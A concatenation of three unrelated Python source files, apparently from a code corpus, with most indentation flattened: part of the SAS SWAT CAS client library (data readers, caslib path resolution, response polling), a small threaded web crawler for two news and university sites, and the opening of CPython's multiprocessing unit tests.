If you are moving large amounts of data, you may want to use
a direct database connector from CAS.
See Also
--------
:func:`pandas.read_sql`
:meth:`read_sql_table`
:meth:`read_sql_query`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sql', sql, con, casout=casout, **kwargs)
def read_gbq(self, query, casout=None, **kwargs):
'''
Load data from a Google BigQuery into a CAS table
This method calls :func:`pandas.read_gbq` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
query : string
SQL-like query to return data values.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_gbq`.
See Also
--------
:func:`pandas.read_gbq`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_gbq', query, casout=casout, **kwargs)
def read_stata(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read Stata file into a CAS table
This method calls :func:`pandas.read_stata` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : string or file-like object
Path to .dta file or file-like object containing data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_stata`.
See Also
--------
:func:`pandas.read_stata`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_stata', filepath_or_buffer, casout=casout, **kwargs)
def path_to_caslib(self, path, name=None, **kwargs):
'''
Return a caslib name for a given path
If a caslib does not exist for the current path or for a parent
path, a new caslib will be created.
Parameters
----------
path : string
The absolute path to the desired caslib directory
name : string, optional
The name to give to the caslib, if a new one is created
kwargs : keyword-parameter, optional
Additional parameters to use when creating a new caslib
Returns
-------
( caslib-name, relative-path )
The return value is a two-element tuple. The first element
is the name of the caslib. The second element is the relative
path to the requested directory from the caslib. The second
element will be blank if the given path matches a caslib,
or a new caslib is created.
'''
if not name:
name = 'Caslib_%x' % random.randint(0, 10**9)
activeonadd_key = None
subdirectories_key = None
datasource_key = None
for key, value in kwargs.items():
if key.lower() == 'activeonadd':
activeonadd_key = key
elif key.lower() == 'subdirectories':
subdirectories_key = key
elif key.lower() == 'datasource':
datasource_key = key
if not activeonadd_key:
activeonadd_key = 'activeonadd'
kwargs[activeonadd_key] = False
if not subdirectories_key:
subdirectories_key = 'subdirectories'
kwargs[subdirectories_key] = True
if not datasource_key:
datasource_key = 'datasource'
kwargs[datasource_key] = dict(srctype='path')
is_windows = self.server_type.startswith('win')
if is_windows:
sep = '\\'
normpath = path.lower()
else:
sep = '/'
normpath = path
if normpath.endswith(sep):
normpath = normpath[:-1]
info = self.retrieve('table.caslibinfo',
_messagelevel='error')['CASLibInfo']
for libname, item, subdirs in zip(info['Name'], info['Path'],
info['Subdirs']):
if item.endswith(sep):
item = item[:-1]
if is_windows:
item = item.lower()
if item == normpath:
if bool(subdirs) != bool(kwargs[subdirectories_key]):
raise SWATError('caslib exists, but subdirectories flag differs')
return libname, ''
elif normpath.startswith(item):
if bool(subdirs) != bool(kwargs[subdirectories_key]):
raise SWATError('caslib exists, but subdirectories flag differs')
return libname, path[len(item) + 1:]
out = self.retrieve('table.addcaslib', _messagelevel='error',
name=name, path=path, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return name, ''
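# A minimal usage sketch for path_to_caslib: combine the returned
# (caslib-name, relative-path) tuple with load_path.  The connection and the
# server-side directory below are hypothetical examples.
def _example_path_to_caslib(conn):
    ''' Resolve a caslib for a server path and load a CSV from it (sketch) '''
    caslib, relpath = conn.path_to_caslib('/data/projects/iris')
    # relpath is '' when the path matches (or newly creates) a caslib;
    # otherwise it is the requested directory relative to that caslib.
    filename = relpath + '/iris.csv' if relpath else 'iris.csv'
    return conn.load_path(filename, caslib=caslib)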
def getone(connection, datamsghandler=None):
'''
Get a single response from a connection
Parameters
----------
connection : :class:`CAS` object
The connection/CASAction to get the response from.
datamsghandler : :class:`CASDataMsgHandler` object, optional
The object to use for data messages from the server.
Examples
--------
>>> conn = swat.CAS()
>>> conn.invoke('serverstatus')
>>> print(getone(conn))
See Also
--------
:meth:`CAS.invoke`
Returns
-------
:class:`CASResponse` object
'''
output = None, connection
# enable data messages as needed
if datamsghandler is not None:
errorcheck(connection._sw_connection.enableDataMessages(),
connection._sw_connection)
_sw_message = errorcheck(connection._sw_connection.receive(),
connection._sw_connection)
if _sw_message:
mtype = _sw_message.getType()
if mtype == 'response':
_sw_response = errorcheck(_sw_message.toResponse(
connection._sw_connection), _sw_message)
if _sw_response is not None:
output = CASResponse(_sw_response, connection=connection), connection
elif mtype == 'request' and datamsghandler is not None:
_sw_request = errorcheck(_sw_message.toRequest(
connection._sw_connection), _sw_message)
if _sw_request is not None:
req = CASRequest(_sw_request)
output = datamsghandler(req, connection)
elif mtype == 'request':
_sw_request = errorcheck(_sw_message.toRequest(
connection._sw_connection), _sw_message)
if _sw_request is not None:
req = CASRequest(_sw_request)
output = req, connection
if datamsghandler is not None:
errorcheck(connection._sw_connection.disableDataMessages(),
connection._sw_connection)
# Raise exception as needed
if isinstance(output[0], CASResponse):
exception_on_severity = get_option('cas.exception_on_severity')
if exception_on_severity is not None and \
output[0].disposition.severity >= exception_on_severity:
raise SWATCASActionError(output[0].disposition.status, output[0], output[1])
return output
def getnext(*objs, **kwargs):
'''
Return responses as they appear from multiple connections
Parameters
----------
*objs : :class:`CAS` objects and/or :class:`CASAction` objects
Connection/CASAction objects to watch for responses.
timeout : int, optional
Timeout for waiting for a response on each connection.
datamsghandler : :class:`CASDataMsgHandler` object, optional
The object to use for data messages from the server.
Examples
--------
>>> conn1 = swat.CAS()
>>> conn2 = swat.CAS()
>>> conn1.invoke('serverstatus')
>>> conn2.invoke('userinfo')
>>> for resp in getnext(conn1, conn2):
... for k, v in resp:
... print(k, v)
See Also
--------
:meth:`CAS.invoke`
Returns
-------
:class:`CASResponse` object
'''
timeout = kwargs.get('timeout', 0)
datamsghandler = kwargs.get('datamsghandler')
if len(objs) == 1 and isinstance(objs[0], (list, tuple, set)):
connections = list(objs[0])
else:
connections = list(objs)
# if the item is a CASAction, use the underlying connection
for i, conn in enumerate(connections):
if isinstance(conn, CASAction):
conn.invoke()
connections[i] = conn.get_connection()
# TODO: Set timeouts; check for mixed connection types
if isinstance(connections[0]._sw_connection, rest.REST_CASConnection):
for item in connections:
yield getone(item)
return
_sw_watcher = errorcheck(clib.SW_CASConnectionEventWatcher(len(connections), timeout,
a2n(connections[
0]._soptions),
connections[0]._sw_error),
connections[0]._sw_error)
for item in connections:
errorcheck(_sw_watcher.addConnection(item._sw_connection), _sw_watcher)
try:
while True:
i = errorcheck(_sw_watcher.wait(), _sw_watcher)
# finished
if i == -2:
break
# timeout / retry
if i == -1:
yield [], None
yield getone(connections[i], datamsghandler=datamsghandler)
except (KeyboardInterrupt, SystemExit):
for conn in connections:
errorcheck(conn._sw_connection.stopAction(), conn._sw_connection)
raise
def dir_actions(obj):
''' Return list of CAS actionsets / actions associated with the object '''
if hasattr(obj, '__dir_actions__'):
return obj.__dir_actions__()
return []
def dir_members(obj):
''' Return list of members not including associated CAS actionsets / actions '''
if hasattr(obj, '__dir_members__'):
return obj.__dir_members__()
return dir(obj)
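# A short, hypothetical sketch showing how dir_actions and dir_members can be
# used together to separate CAS action names from ordinary Python attributes
# on a connection (or CASTable) object.
def _example_dir_helpers(obj):
    ''' Return (actions, members) name lists for a CAS-aware object (sketch) '''
    actions = sorted(dir_actions(obj))
    members = sorted(set(dir_members(obj)) - set(actions))
    return actions, members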
|
crawler.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 6 12:49:02 2016
@author: daniel
"""
import logging
import threading # For main processing thread
import urllib # For downloading websites
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor # each downloads a website
from http.client import RemoteDisconnected
from queue import Queue, Empty # For processing downloaded websites
from socket import timeout as socket_timeout
from pyoogle.config import LOGGING_LEVEL
from pyoogle.preprocessing.crawl.linkconstraint import LinkConstraint # constraint to which links are allowed
from pyoogle.preprocessing.web.net import WebNet
from pyoogle.preprocessing.web.node import WebNode
from pyoogle.preprocessing.web.nodestore import WebNodeStore # for permanently saving created WebNodes
from pyoogle.preprocessing.web.parser import WebParser # parses the downloaded html site and extracts info
logging.getLogger().setLevel(LOGGING_LEVEL)
NotResolvable = "NOT_RESOLVABLE_LINK"
class Crawler:
# Initializes the Crawler. If max_sites is greater than zero, only that many
# sites are downloaded before stopping; otherwise crawling continues until no new site is found.
def __init__(self, store_path, link_constraint, max_sites=0, max_workers=2, timeout=30):
self.store_path = store_path
self.pending_links = Queue()
self.pending_websites = Queue()
self.web_net = None
self.link_constraint = link_constraint
if self.link_constraint is None:
raise ValueError("No link constraint given!")
self.already_processed_links = set()
self.already_processed_websites = set()
self.is_crawling = False
self.max_sites = max_sites
self.processed_sites_count = 0
self.max_workers = max_workers
self.timeout = timeout
self.starting_processor = None
self.links_processor = None
self.websites_processor = None
def _is_finished(self):
return not self.is_crawling or self.has_maximum_sites_processed()
def has_maximum_sites_processed(self):
return 0 < self.max_sites <= self.processed_sites_count
def process_link(self, link):
if self._is_finished():
return
website = Crawler.download_website(link, self.timeout)
if website is None:
logging.debug("Website %s not downloaded", link)
if website is NotResolvable:
logging.debug("Website %s not resolvable and not trying again.", link)
return
return self, link, website
@staticmethod
def link_got_processed(future):
if future.done() and future.result() is not None:
self, link, website = future.result()
if self._is_finished():
return
if website is None:
# revert and try later
logging.debug("Website %s not downloaded, retrying later ", link)
self.add_link(link)
return
if not self.has_maximum_sites_processed():
self.pending_websites.put((link, website))
def obtain_new_link(self):
link = None
while link is None and not self._is_finished():
try:
link = self.pending_links.get(timeout=self.timeout)
except Empty:
logging.info("No more links found to process!")
return
if link in self.already_processed_links:
link = None
continue # already processed
if link is not None:
self.already_processed_links.add(link)
return link
def process_links(self):
logging.info("Starting to process links")
try:
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
while not self._is_finished():
# this may submit many futures when testing with a limited max_sites (> 0),
# but they will simply be ignored!
link = self.obtain_new_link()
if link is None:
return
future = executor.submit(self.process_link, link)
future.add_done_callback(Crawler.link_got_processed)
finally:
self.stop() # ensure crawler is really stopped
def process_website(self, link, website):
logging.debug("Starting to parse %s pending links %d", link, self.pending_links.qsize())
try:
webparser = WebParser(link, website)
except ValueError:
logging.debug("Website %s not parsable, ignored but out link kept", link)
return
web_hash = hash(webparser)
if web_hash in self.already_processed_websites:
# Already processed but with a different url, add this url to node so we know this in the future!
logging.debug("Website %s already processed (with different url)!", link)
node = self.web_net.get_by_content_hash(web_hash)
if node is not None:
node.add_url(link)
return
logging.info("Processed %d.link %s pending websites %d",
self.processed_sites_count + 1, link, self.pending_websites.qsize())
self.already_processed_websites.add(web_hash)
self.processed_sites_count += 1
builder = WebNode.Builder(self.link_constraint)
builder.init_from_webparser(webparser)
webnode = builder.make_node()
self.web_net.add_node(webnode)
for link in webnode.get_out_links():
self.add_link(link)
def process_websites(self, clear_store):
# We are required to open the store in the same thread the store is modified in
logging.info("Starting to process websites")
with WebNodeStore(self.store_path, clear_store) as node_store:
try:
while not self._is_finished():
data = self.pending_websites.get(block=True)
if data is None:
break
link, website = data
self.process_website(link, website)
node_store.save_webnodes(self.web_net.get_nodes())
finally:
self.stop() # ensure crawler is really stopped
def _init_net(self, clear_store):
self.web_net = WebNet()
if not clear_store:
# Do not clear the store but add new nodes to it, load and add existing to webnet
with WebNodeStore(self.store_path, clear=False) as node_store:
for node in node_store.load_webnodes(True):
self.already_processed_websites.add(node.get_content_hash())
for link in node.get_urls():
self.already_processed_links.add(link)
self.web_net.add_node(node)
# After marking all already processed links, queue the remaining outgoing links to restart the crawl
restart_link_count = 0
total_link_out = 0
for node in self.web_net:
for link in node.get_out_links():
total_link_out += 1
if link not in self.already_processed_links:
self.add_link(link)
restart_link_count += 1
logging.info("Restarting with %d links of %d", restart_link_count, total_link_out)
def _start_async(self, clear_store):
self._init_net(clear_store)
self.links_processor = threading.Thread(target=self.process_links)
self.links_processor.start()
self.websites_processor = threading.Thread(target=Crawler.process_websites, args=[self, clear_store])
self.websites_processor.start()
def join(self):
try:
self.starting_processor.join() # If this stops blocking, the other processors are valid
self.websites_processor.join()
self.links_processor.join()
except KeyboardInterrupt:
self.stop()
def start(self, start_url, clear_store=True):
logging.info("Starting crawling at %s", start_url)
self.is_crawling = True
self.add_link(start_url)
self.starting_processor = threading.Thread(target=Crawler._start_async, args=[self, clear_store])
self.starting_processor.start()
def add_link(self, link):
link = self.link_constraint.get_valid(link)
if link is None:
return
self.pending_links.put(link)
def stop(self):
if self.is_crawling: # Race condition safe (could be executed multiple times)
logging.info("Stopping crawling")
self.is_crawling = False
self.pending_websites.put(None) # Ensure threads do not wait forever and exit
self.pending_links.put(None)
@staticmethod
def download_website(url, timeout):
# Download and read website
logging.debug("Downloading website %s", url)
try:
website = urllib.request.urlopen(url, timeout=timeout).read()
except socket_timeout:
logging.debug("Timeout error when downloading %s", url)
website = None
except urllib.error.HTTPError as err:
if int(err.code / 100) == 4:
logging.debug("Client http error when downloading %s %s", url, err)
website = NotResolvable # 404 Not Found or other Client Error, ignore link in future
else:
logging.debug("HTTP Error when downloading %d %s %s", err.code, url, err)
website = None
except urllib.error.URLError as err:
logging.debug("Url error when downloading %s %s", url, err)
website = None
except RemoteDisconnected as disc:
logging.debug("(RemoteDisconnect) error when downloading %s %s", url, disc)
website = NotResolvable
except UnicodeEncodeError:
logging.debug("(UnicodeEncodeError) error when downloading %s", url)
website = NotResolvable
return website
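# A small, illustrative use of Crawler.download_website outside the crawl loop.
# The URL is a placeholder.  NotResolvable marks links that should never be
# retried, while None means the download failed only temporarily.
def example_single_download(url="http://www.example.com", timeout=10):
    content = Crawler.download_website(url, timeout)
    if content is NotResolvable:
        logging.info("%s is not resolvable, giving up", url)
    elif content is None:
        logging.info("%s failed temporarily, could be retried later", url)
    else:
        logging.info("downloaded %d bytes from %s", len(content), url)
    return content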
def crawl_mathy():
# Build constraint that describes which outgoing WebNode links to follow
constraint = LinkConstraint('http', 'www.math.kit.edu')
# Prevent downloading links with these endings
# Frequent candidates: '.png', '.jpg', '.jpeg', '.pdf', '.ico', '.doc', '.txt', '.gz', '.zip', '.tar','.ps',
# '.docx', '.tex', 'gif', '.ppt', '.m', '.mw', '.mp3', '.wav', '.mp4'
forbidden_endings = ['.pdf', '.png', '.ico', '#top'] # for fast exclusion
constraint.add_rule(lambda link: all((not link.lower().endswith(ending) for ending in forbidden_endings)))
# Forbid any dot in the last path segment, since such a link likely points to a file we are not interested in
def rule_no_point_in_last_path_segment(link_parsed):
split = link_parsed.path.split("/")
return len(split) == 0 or "." not in split[-1]
constraint.add_rule(rule_no_point_in_last_path_segment, parsed_link=True)
# Start the crawler from a start domain, optionally loading already existing nodes
from pyoogle.config import DATABASE_PATH
path = DATABASE_PATH
c = Crawler(path, constraint)
c.start("http://www.math.kit.edu", clear_store=False)
# Wait for the crawler to finish
c.join()
webnet = c.web_net
logging.info("DONE, webnet contains %d nodes", len(webnet))
return path, webnet
def crawl_spon():
constraint = LinkConstraint('', 'www.spiegel.de')
# Forbid any dot in the last path segment, since such a link likely points to a file we are not interested in
def rule_no_point_in_last_path_segment(link_parsed):
split = link_parsed.path.split("/")
return len(split) == 0 or ("." not in split[-1] or
split[-1].lower().endswith(".html") or split[-1].lower().endswith(".htm"))
constraint.add_rule(rule_no_point_in_last_path_segment, parsed_link=True)
path = "/home/daniel/PycharmProjects/PageRank/spon.db"
c = Crawler(path, constraint)
c.start("http://www.spiegel.de", clear_store=False)
# Wait for the crawler to finish
c.join()
webnet = c.web_net
logging.info("DONE, webnet contains %d nodes", len(webnet))
return path, webnet
if __name__ == "__main__":
crawl_spon()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = import_helper.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API as threading.Thread
# (join() and is_alive()), the support function can be reused
threading_helper.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
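# A tiny, self-contained illustration of TimingWrapper: wrap a callable, call
# it, then read the elapsed time from the wrapper.
def _example_timing_wrapper():
    wrapped = TimingWrapper(time.sleep)
    wrapped(0.05)           # returns whatever time.sleep() returns (None)
    return wrapped.elapsed  # roughly 0.05 seconds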
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
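# An illustrative call of the get_value() helper above.  It first tries the
# object's own get_value() method, then falls back to the private attributes
# used by other semaphore implementations.
def _example_get_value():
    sem = threading.Semaphore(3)
    return get_value(sem)   # 3, found via the _value attribute fallback on CPython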
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
